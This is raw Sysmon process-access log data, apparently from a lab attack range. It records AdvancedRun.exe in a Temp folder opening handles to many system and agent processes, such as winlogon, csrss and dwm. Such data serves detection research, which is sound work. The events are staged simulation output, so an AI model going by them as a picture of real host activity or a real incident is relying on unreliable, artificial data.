20:14:45.064{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075341Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.064{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075340Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.064{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004075339Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.064{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075338Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075337Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004075336Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075335Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075334Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075333Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075332Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075331Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075330Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.063{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075329Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.062{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075328Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.061{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075327Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.061{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075326Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:14:45.061{834264DD-1435-61EB-7B08-000000002702}53361504C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004075325Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 